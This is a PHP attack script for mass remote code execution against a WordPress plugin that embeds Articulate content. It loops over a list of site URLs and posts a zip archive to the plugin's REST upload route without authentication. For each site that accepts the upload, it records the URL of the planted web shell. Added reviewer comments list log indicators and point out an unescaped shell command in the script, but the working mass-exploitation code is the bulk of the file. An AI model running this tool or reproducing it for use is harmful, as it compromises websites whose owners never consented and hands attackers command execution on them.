<?php
# Coded by UstadCage_48
# WordPress Plugin Insert or Embed Articulate Content into WordPress Remote Code Execution (Unauthorized)
# https://www.exploitkita.org/2019/06/wordpress-plugin-insert-or-embed.html?m=1
# Exploit-Kita.org
# Author : Rinto (con7ext)
# Usage : php tools.php list.txt
# File : https://drive.google.com/file/d/1-5Dbrb4QG_wUTq5e7FsWWXQMLjlbehL0/view?usp=drivesdk
# Don't Change Name File tadd.zip !
#
# Reviewer summary: a command-line script that walks a list of site URLs and, for
# each one, posts a local archive named tadd.zip to the plugin's REST route
# /index.php/wp-json/articulate/v1/upload-data. The request carries no cookie,
# nonce or Authorization header. Sites whose response contains "Upload Complete"
# are printed and appended to wp.txt.
# For log review, the script itself shows three indicators: the route above, the
# multipart fields name=tadd.zip / chunk=2 / chunks=3, and a follow-up request to
# index.php?x=... under the directory returned in the response's "path" field.
# The fixed plugin release is not stated on this page; confirm that the installed
# release enforces authentication on this route.

# Turns off all PHP error reporting for the rest of the run, so an unreadable list
# file or a failed curl call produces no diagnostic output.
error_reporting(0);
/**
 * Append one line to the file "<ext>.txt" in the current working directory.
 *
 * The file is opened in append mode, so earlier results are kept between calls.
 * The return values of the open and write calls are not checked.
 *
 * @param string $site Text to record; a newline is added after it.
 * @param string $ext  Base name of the log file, without the ".txt" suffix.
 */
function sv($site,$ext){
    $logHandle = fopen($ext . '.txt', 'a');
    fwrite($logHandle, $site . "\n");
    fclose($logHandle);
}
// ANSI colour escape sequences for terminal output. The variable names are
// Indonesian: kuning = yellow, ungu = purple, biru = blue, merah = red, hijau = green.
$kuning = "\033[93m";
$ungu = "\033[95m";
$biru = "\033[94m"; // not referenced anywhere in the visible script
$merah = "\033[91m";
$hijau = "\033[92m";

// Read the file named by the first CLI argument and split it on "\n".
// Each entry is used below as a site base URL.
$tad = explode("\n",file_get_contents($argv[1]));
foreach($tad as $lusi){
    // try
    // Shells out to curl for a multipart POST to the plugin's REST upload route.
    // No cookie, nonce or Authorization header is sent, which matches the
    // "Unauthorized" claim in the file header.
    // Log indicators visible here: POST to /index.php/wp-json/articulate/v1/upload-data
    // with form fields name=tadd.zip, chunk=2, chunks=3 and a file part.
    // NOTE(review): $lusi is concatenated into the command line without
    // escapeshellarg(), so a list entry containing shell metacharacters runs as a
    // command on the host executing this script. Analyse the sample only in an
    // isolated environment and treat the list file as untrusted input.
    $up = shell_exec('curl -s -F "name=tadd.zip" -F "chunk=2" -F "chunks=3" -F "file=@tadd.zip" '.$lusi.'/index.php/wp-json/articulate/v1/upload-data');
    // Pull the value of the "path" field out of the response text by regex;
    // the response is not decoded as JSON.
    preg_match('/"path" : "(.*?)",/',$up,$path);
    // The upload counts as accepted only if the response text contains this literal.
    if(preg_match('/Upload Complete/',$up)){
        // Join the base URL and the returned path, then split into URL components.
        $parse = parse_url($lusi.$path[1]);
        $pattern = '~\w+\.html~';
        // preg_replace() on an array processes every element, so any "<word>.html"
        // file name is stripped from each component, leaving the path at its directory.
        $parse = preg_replace($pattern, '', $parse);
        $site = $parse['scheme'].'://'.$parse['host'].$parse['path'];
        // Undo the JSON-style "\/" escaping left in the path taken from the response.
        $str = str_replace("\/","/",$site);
        echo "$ungu [$] $hijau Target : $kuning ".$lusi."\n";
        // The printed and logged URL targets index.php with an "x" query parameter
        // inside the extracted directory; presumably index.php ships in tadd.zip
        // (archive contents are not shown on this page). Requests to
        // <returned path>/index.php?x=... are the follow-up indicator to search
        // for, and an unexpected index.php in that directory should be treated
        // as a sign of compromise.
        echo "$ungu [$] $hijau Shellx : $ungu : $hijau ".$str."index.php?x=ls\n\n";
        // Appends the result URL to wp.txt through sv().
        sv($str."index.php?x=ls","wp");
    } else {
        // Any other response, including an empty one from a failed curl call,
        // is reported as not vulnerable.
        echo "$ungu [$] $kuning $lusi$ungu : $merah No Vulnerable \n\n";
    }
}